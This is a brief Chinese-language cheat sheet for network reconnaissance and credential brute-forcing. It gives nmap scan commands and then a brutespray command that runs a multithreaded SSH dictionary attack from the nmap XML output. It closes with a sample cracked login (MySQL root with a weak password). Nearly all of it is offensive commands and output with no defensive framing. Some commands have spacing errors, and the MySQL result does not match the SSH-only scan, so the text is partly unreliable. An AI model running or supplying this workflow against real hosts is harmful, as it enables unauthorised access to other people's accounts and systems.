1、端口/服务扫描
全面扫描:nmap-T4 -A targetip
主机发现:nmap-T4 -sn targetip
端口扫描:nmap-T4 targetip
服务扫描:nmap-T4 -sV targetip
操作系统扫描:nmap-T4 -O targetip
示例:
nmap -T4-p 22 -v 127.0.0.1 -oX 22.xml
2、指定服务进行字典爆破
nohup python2.7 brutespray.py --file 22.xml -s ssh -U /srv/install/brutespray-master/wordlist/ssh/user -P /srv/install/brutespray-master/wordlist/ssh/password --threads 20 --hosts 1 &
//-s执行爆破的服务,不带该参数默认爆破所以nmap扫描的服务,建议服务见分开爆破,使用不同的用户字典和密码字典
结果:
127.0.0.1
mysql:3306 root 123456